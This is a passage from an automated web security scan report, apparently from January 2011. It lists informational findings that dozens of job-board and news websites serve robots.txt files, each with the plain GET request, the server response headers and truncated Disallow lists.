X-Pad: avoid browser bug
Content-Length: 7152
Connection: close
Via: 1.1 AN-0016020122545304

       User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallo
...[SNIP]...

19.42. http://www.giscrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.giscrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.giscrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:27:27 GMT
Server: Apache
Last-Modified: Wed, 28 Oct 2009 08:33:37 GMT
ETag: "1c980fc-1bf0-476faa6ab7a40"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 7152
Connection: close
Via: 1.1 AN-0016020122545304

       User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallo
...[SNIP]...

19.43. http://www.governmentcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.governmentcrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.governmentcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:27:49 GMT
Server: Apache
Last-Modified: Wed, 28 Oct 2009 09:10:43 GMT
ETag: "2282046-1bd8-476fb2b598ac0"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 7128
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallow: /soap
Disallow: /xaja
...[SNIP]...

19.44. http://www.graduateschoolloans.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.graduateschoolloans.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.graduateschoolloans.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:27:58 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
Last-Modified: Thu, 03 May 2007 04:52:07 GMT
ETag: "da0c63-20f7-42f8998c64bc0"
Accept-Ranges: bytes
Content-Length: 8439
Connection: close
Content-Type: text/plain; charset=UTF-8

# Robots.txt file for http://www.medicalschoolloans.com

User-agent: Googlebot
Sitemap: http://www.medicalschoolloans.com/sitemap.xml
Disallow: /admin
Disallow: /calculator
Disallow: /chat
Disa
...[SNIP]...

19.45. http://www.healthcarecrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.healthcarecrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.healthcarecrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:04 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 28 Oct 2009 08:33:53 GMT
ETag: "25c8145-1bf0-476faa79f9e40"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Content-Length: 7152
Connection: close
Via: 1.1 AN-0016020122545304

       User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallo
...[SNIP]...

19.46. http://www.helpdeskcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.helpdeskcrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.helpdeskcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:09 GMT
Server: Apache
Last-Modified: Wed, 28 Oct 2009 09:11:11 GMT
ETag: "1d8819c-1bd8-476fb2d04c9c0"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 7128
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallow: /soap
Disallow: /xaja
...[SNIP]...

19.47. http://www.hospitalitycrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hospitalitycrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hospitalitycrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:09 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 28 Oct 2009 08:34:13 GMT
ETag: "25d03f2-1bf0-476faa8d0cb40"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Content-Length: 7152
Connection: close
Via: 1.1 AN-0016020122545304

       User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallo
...[SNIP]...

19.48. http://www.hrcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hrcrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hrcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:19 GMT
Server: Apache
Last-Modified: Tue, 13 Apr 2010 09:21:30 GMT
ETag: "1d501f7-1a82-4841ac9699a80"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 6786
Connection: close
Via: 1.1 AN-0016020122545304

               User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seoDisallow: /soap
Disallow: /xajax_js
Disallow: /h
...[SNIP]...

19.49. http://www.huffingtonpost.com/2011/01/12/sarah-palin-arizona-shooting-statement_n_807833.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /2011/01/12/sarah-palin-arizona-shooting-statement_n_807833.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.huffingtonpost.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.8 (Unix)
Last-Modified: Fri, 21 May 2010 12:59:43 GMT
ETag: "3eca348-b5-4871a43c92dc0"
Content-Type: text/plain; charset=utf-8
Date: Fri, 21 Jan 2011 22:28:28 GMT
Content-Length: 181
Connection: close

# All robots will spider the domain
User-agent: *
Disallow:

User-agent: *
Disallow: /backstage/

User-agent: *
Disallow: /blackberry/

User-agent: *
Disallow: /users/becomeFan.php

19.50. http://www.hvaccrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hvaccrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hvaccrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:33 GMT
Server: Apache
Last-Modified: Wed, 28 Oct 2009 08:34:49 GMT
ETag: "1c7854c-1bf0-476faaaf61c40"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 7152
Connection: close
Via: 1.1 AN-0016020122545304

       User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallo
...[SNIP]...

19.51. http://www.informationtechnologycrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.informationtechnologycrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.informationtechnologycrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:50 GMT
Server: Apache
Last-Modified: Fri, 09 Apr 2010 05:45:04 GMT
ETag: "1cc01f8-1a83-483c74c057800"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 6787
Connection: close
Via: 1.1 AN-0016020122545304

       User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /soap
Disallow: /xajax_js
Disallow: /ht
...[SNIP]...

19.52. http://www.insurcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.insurcrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.insurcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:47 GMT
Server: Apache
Last-Modified: Wed, 28 Oct 2009 08:35:10 GMT
ETag: "22a945c-1bf0-476faac368b80"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 7152
Connection: close
Via: 1.1 AN-0016020122545304

       User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallo
...[SNIP]...

19.53. http://www.intellectualpropertycrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intellectualpropertycrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.intellectualpropertycrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:47 GMT
Server: Apache
Last-Modified: Fri, 09 Apr 2010 05:50:29 GMT
ETag: "22f08da-1a83-483c75f649340"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 6787
Connection: close
Via: 1.1 AN-0016020122545304

       User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /soap
Disallow: /xajax_js
Disallow: /ht
...[SNIP]...

19.54. http://www.internshipcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.internshipcrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.internshipcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:50 GMT
Server: Apache
Last-Modified: Fri, 09 Apr 2010 05:43:40 GMT
ETag: "1b80322-1a83-483c74703bb00"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 6787
Connection: close
Via: 1.1 AN-0016020122545304

       User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /soap
Disallow: /xajax_js
Disallow: /ht
...[SNIP]...

19.55. http://www.j2eecrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.j2eecrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.j2eecrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:57 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 28 Oct 2009 09:11:53 GMT
ETag: "2650104-1bd8-476fb2f85a840"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Content-Length: 7128
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallow: /soap
Disallow: /xaja
...[SNIP]...

19.56. http://www.journalismcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.journalismcrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.journalismcrossing.com

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:25:10 GMT
Server: Apache
Last-Modified: Fri, 09 Apr 2010 05:52:50 GMT
ETag: "22f1718-1a83-483c767cc1080"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 6787
Connection: close
Via: 1.1 AN-0016020122545304

       User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /soap
Disallow: /xajax_js
Disallow: /ht
...[SNIP]...

19.57. http://www.logisticscrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.logisticscrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.logisticscrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:38:50 GMT
Server: Apache
Last-Modified: Fri, 09 Apr 2010 05:53:10 GMT
ETag: "22aa0fd-1a83-483c768fd3d80"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 6787
Connection: close
Via: 1.1 AN-0016020122545304

       User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /soap
Disallow: /xajax_js
Disallow: /ht
...[SNIP]...

19.58. http://www.managercrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.managercrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.managercrossing.com

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:23:12 GMT
Server: Apache
Last-Modified: Mon, 08 Nov 2010 15:19:05 GMT
ETag: "1c881c1-1a7f-4948c25104c40"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 6783
Connection: close
Via: 1.1 AN-0016020122545304

       User-agent: Googlebot
Visit-time: 0500-13:00
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seoDisallow: /soap
Disallow: /xajax_js
Disallow: /ht
...[SNIP]...

19.59. http://www.manufacturingcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.manufacturingcrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.manufacturingcrossing.com

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:22:48 GMT
Server: Apache
Last-Modified: Mon, 08 Nov 2010 15:18:21 GMT
ETag: "22d01a5-1b0f-4948c2270e940"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 6927
Connection: close
Via: 1.1 AN-0016020122545304

       User-agent: Googlebot
Visit-time: 0500-13:00
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallow: /soap
Disallow:
...[SNIP]...

19.60. http://www.marketingcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marketingcrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.marketingcrossing.com

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:24:41 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Sat, 26 Dec 2009 11:39:31 GMT
ETag: "25b0359-1cea-47ba0202322c0"
Accept-Ranges: bytes
Content-Length: 7402
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallow: /soap
Disallow: /xaja
...[SNIP]...

19.61. http://www.mediajobcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediajobcrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mediajobcrossing.com

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:23:24 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 28 Oct 2009 09:13:45 GMT
ETag: "25a02ee-1bd8-476fb3632a440"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Content-Length: 7128
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallow: /soap
Disallow: /xaja
...[SNIP]...

19.62. http://www.medicalschoolloans.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.medicalschoolloans.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.medicalschoolloans.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:53 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
Last-Modified: Mon, 23 Apr 2007 06:58:45 GMT
ETag: "e98580-2086-42ec2333cd340"
Accept-Ranges: bytes
Content-Length: 8326
Connection: close
Content-Type: text/plain; charset=UTF-8

# Robots.txt file for http://www.medicalschoolloans.com

User-agent: Googlebot
Sitemap: http://www.medicalschoolloans.com/sitemap.xml
Disallow: /admin
Disallow: /calculator
Disallow: /chat
Disa
...[SNIP]...

19.63. http://www.militarycrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.militarycrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.militarycrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:32 GMT
Server: Apache
Last-Modified: Wed, 28 Oct 2009 08:35:48 GMT
ETag: "1c30107-1bf0-476faae7a6100"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 7152
Connection: close
Via: 1.1 AN-0016020122545304

       User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallo
...[SNIP]...

19.64. http://www.msnbc.msn.com/id/41161439/ns/politics-more_politics/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.msn.com
Path:   /id/41161439/ns/politics-more_politics/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.msnbc.msn.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Wed, 30 Jun 2010 19:46:20 GMT
Accept-Ranges: bytes
ETag: "74cb8de98c18cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 151
Date: Fri, 21 Jan 2011 23:39:25 GMT
Connection: close
Set-Cookie: SSLB=0; path=/; domain=.msnbc.msn.com

# robots.txt file for www.msnbc.com, www.cnbc.com

User-agent: *
Disallow: error404.aspx

Sitemap: http://www.msnbc.msn.com/xml/SitemapIndex.xml

19.65. http://www.nursingcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nursingcrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nursingcrossing.com

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:24:00 GMT
Server: Apache
Last-Modified: Wed, 28 Oct 2009 08:36:07 GMT
ETag: "21f015a-1bf0-476faaf9c4bc0"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 7152
Connection: close
Via: 1.1 AN-0016020122545304

       User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallo
...[SNIP]...

19.66. http://www.nytimes.com/2011/01/18/books/18book.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nytimes.com
Path:   /2011/01/18/books/18book.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nytimes.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 22 Jan 2011 01:23:31 GMT
Content-length: 637
Content-type: text/plain
Set-cookie: RMID=0b5d4aea4f854d3a319327e5; expires=Sunday, 22-Jan-2012 01:23:31 GMT; path=/; domain=.nytimes.com
Last-modified: Mon, 26 Apr 2010 17:28:40 GMT
Accept-ranges: bytes
Connection: keep-alive

User-agent: *
Allow: /ads/public/
Disallow: /ads/
Disallow: /adx/bin/
Disallow: /aponline/
Disallow: /archives/
Disallow: /auth/
Disallow: /cnet/
Disallow: /college/
Disallow: /external/
Disallow: /fi
...[SNIP]...

19.67. http://www.occupationaltherapycrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.occupationaltherapycrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.occupationaltherapycrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:43:25 GMT
Server: Apache
Last-Modified: Wed, 28 Oct 2009 08:36:27 GMT
ETag: "22a00ff-1bf0-476fab0cd78c0"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 7152
Connection: close
Via: 1.1 AN-0016020122545304

       User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallo
...[SNIP]...

19.68. http://www.operationscrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.operationscrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.operationscrossing.com

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:24:03 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 09 Apr 2010 05:44:38 GMT
ETag: "25483f0-1a83-483c74a78bd80"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Content-Length: 6787
Connection: close
Via: 1.1 AN-0016020122545304

       User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /soap
Disallow: /xajax_js
Disallow: /ht
...[SNIP]...

19.69. http://www.parttimecrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.parttimecrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.parttimecrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:14 GMT
Server: Apache
Last-Modified: Fri, 09 Apr 2010 05:54:36 GMT
ETag: "22d05b0-1a83-483c76e1d7f00"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 6787
Connection: close
Via: 1.1 AN-0016020122545304

       User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /soap
Disallow: /xajax_js
Disallow: /ht
...[SNIP]...

19.70. http://www.pharmaceuticalcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pharmaceuticalcrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pharmaceuticalcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:43:24 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 09 Apr 2010 05:39:50 GMT
ETag: "269830f-1a84-483c7394e3580"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Content-Length: 6788
Connection: close
Via: 1.1 AN-0016020122545304

       User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /soap
Disallow: /xajax_js
Disallow: /ht
...[SNIP]...

19.71. http://www.physicalsecuritycrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.physicalsecuritycrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.physicalsecuritycrossing.com

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:22:53 GMT
Server: Apache
Last-Modified: Fri, 09 Apr 2010 05:53:32 GMT
ETag: "2138111-1a83-483c76a4cef00"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 6787
Connection: close
Via: 1.1 AN-0016020122545304

       User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /soap
Disallow: /xajax_js
Disallow: /ht
...[SNIP]...

19.72. http://www.physicaltherapycrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.physicaltherapycrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.physicaltherapycrossing.com

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:25:19 GMT
Server: Apache
Last-Modified: Mon, 08 Nov 2010 15:25:25 GMT
ETag: "2218488-1b0e-4948c3bb6a340"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 6926
Connection: close
Via: 1.1 AN-0016020122545304

       User-agent: Googlebot
Visit-time: 1000-1500
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallow: /soap
Disallow:
...[SNIP]...

19.73. http://www.planningcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.planningcrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.planningcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:38:14 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 28 Oct 2009 08:37:09 GMT
ETag: "25d8332-1bf1-476fab34e5740"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Content-Length: 7153
Connection: close
Via: 1.1 AN-0016020122545304

       User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallo
...[SNIP]...

19.74. http://www.politico.com/blogs/onmedia/1210/Assanges_memoir_advance_tops_1_million.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.politico.com
Path:   /blogs/onmedia/1210/Assanges_memoir_advance_tops_1_million.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.politico.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.6 (Fedora)
Last-Modified: Tue, 18 Nov 2008 21:19:00 GMT
ETag: "80e01b-158-3e7bd900"
Content-Type: text/plain
Cache-Control: max-age=300
Expires: Fri, 21 Jan 2011 23:44:49 GMT
Date: Fri, 21 Jan 2011 23:39:49 GMT
Content-Length: 344
Connection: close

Sitemap: http://www.politico.com/sitemap_index.xml
Sitemap: http://www.politico.com/sitemap_googlenews.xml
Sitemap: http://www.politico.com/sitemap_news.xml
User-agent: *
Disallow: /2step
Disallo
...[SNIP]...

19.75. http://www.postdoctoralfellowcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.postdoctoralfellowcrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.postdoctoralfellowcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:38:39 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 13 Apr 2010 09:22:53 GMT
ETag: "24d0113-1a82-4841ace5c1540"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Content-Length: 6786
Connection: close
Via: 1.1 AN-0016020122545304

                       User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seoDisallow: /soap
Disallow: /xajax_js
Disallow:
...[SNIP]...

19.76. http://www.prcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
